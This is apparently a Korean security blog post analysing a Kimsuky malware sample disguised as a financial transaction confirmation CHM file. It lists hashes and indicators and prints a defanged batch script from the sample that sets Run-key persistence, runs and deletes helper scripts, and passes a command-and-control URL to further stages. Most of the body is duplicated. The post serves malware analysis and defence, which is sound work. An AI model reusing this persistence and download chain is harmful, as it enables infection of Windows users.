북한 해킹단체 김수키(Kimsuky)에서 만든 금융거래확인서로 위장한 악성코드-confirmation.chm(2024.12.10)
Contents
오늘은 북한 해킹단체 김수키(Kimsuky) 에서 만든 금융거래확인서로 위장한 악성코드 confirmation.chm(2024.12.10)에 대해 글을 적어보겠습니다. 일단 해당 금융거래확인서가 발생이 된 것은 2024.9.23일로 확인이 되면 혁신성장촉진자금(운전) 부분으로 돼 있으며 경기도 이천 쪽 중소기업으로 대상으로 타겟한것 같기도 합니다. 먼저 악성코드 해수값은 다음과 같습니다.
파일명:confirmation.chm
사이즈:312,240 Bytes
MD5:08b4bcee92417560d61c5f29649cdfad
SHA-1:38032503b59125fb464e1b7aaa449d33caaafc29
SHA-256:e6bcdb402999f6f35351c0b9a1be84345aea88c3f662ba27341d7857aeb8cc39
일단 해당 코드는 chm 즉 윈도우 도움말처럼 위장하고 있지만 요즈음 이런 것 거의 안 씀
일단 해당 악성코드 분석을 조금 더 박신주의 정신으로 하려고 악성코드를 풀어주면 다음과 같은 파일들이 있는 것을 확인할 수가 있습니다.
먼저 해당 악성코드를 실행하면 openCI.vbs를 실행을 하게 되어져 있는 것을 확인할 수가 있습니다.
C:\Users\Public\Libraries 경로에 있어야 하며 이를 통해 추가적인 악성코드 동작을 합니다.
그리고 사용자 에게는 back.png 이라는 파일을 보여 주게 돼 있습니다.
openCI은 0385768.bat을 실행하려는 것이기 때문에 건너뜀
0385768.bat 코드
@ecxo off
rem aNlW(a)Ya(Z)CNhEeJJvyXnk
pushd "%~(d)p0"
reg query HK(C)U\SOFTWARE\Microso(f)t\Windows\CurrentVe(r)sion\Run /v ope(n)CI > nul
if %ERRORLEVEL% equ 0 (goto NOR(M)AL) else (goto R(E)GISTER)
:REGISTE(R)
reg add HKC(U)\SOFTWARE\Microsoft\Windows\CurrentV(e)rsion\Run /v openCI /t REG_SZ /d "\"%~dp0openCI(.)vbs\""
:NORMAL
if exist "8485823(.)bat" (
call 8485823(.)bat > nul
del /f /q 8485823(.)bat > nul
)
set r=hxxps://nasweir(.0com
call 5674932(.)bat %r% > nul
call 7572639(.)bat …
파일명:confirmation.chm
사이즈:312,240 Bytes
MD5:08b4bcee92417560d61c5f29649cdfad
SHA-1:38032503b59125fb464e1b7aaa449d33caaafc29
SHA-256:e6bcdb402999f6f35351c0b9a1be84345aea88c3f662ba27341d7857aeb8cc39
일단 해당 코드는 chm 즉 윈도우 도움말처럼 위장하고 있지만 요즈음 이런 것 거의 안 씀
일단 해당 악성코드 분석을 조금 더 박신주의 정신으로 하려고 악성코드를 풀어주면 다음과 같은 파일들이 있는 것을 확인할 수가 있습니다.
먼저 해당 악성코드를 실행하면 openCI.vbs를 실행을 하게 되어져 있는 것을 확인할 수가 있습니다.
C:\Users\Public\Libraries 경로에 있어야 하며 이를 통해 추가적인 악성코드 동작을 합니다.
그리고 사용자 에게는 back.png 이라는 파일을 보여 주게 돼 있습니다.
openCI은 0385768.bat을 실행하려는 것이기 때문에 건너뜀
0385768.bat 코드
@ecxo off
rem aNlW(a)Ya(Z)CNhEeJJvyXnk
pushd "%~(d)p0"
reg query HK(C)U\SOFTWARE\Microso(f)t\Windows\CurrentVe(r)sion\Run /v ope(n)CI > nul
if %ERRORLEVEL% equ 0 (goto NOR(M)AL) else (goto R(E)GISTER)
:REGISTE(R)
reg add HKC(U)\SOFTWARE\Microsoft\Windows\CurrentV(e)rsion\Run /v openCI /t REG_SZ /d "\"%~dp0openCI(.)vbs\""
:NORMAL
if exist "8485823(.)bat" (
call 8485823(.)bat > nul
del /f /q 8485823(.)bat > nul
)
set r=hxxps://nasweir(.0com
call 5674932(.)bat %r% > nul
call 7572639(.)bat …
IoC
38032503b59125fb464e1b7aaa449d33caaafc29
08b4bcee92417560d61c5f29649cdfad
e6bcdb402999f6f35351c0b9a1be84345aea88c3f662ba27341d7857aeb8cc39
08b4bcee92417560d61c5f29649cdfad
e6bcdb402999f6f35351c0b9a1be84345aea88c3f662ba27341d7857aeb8cc39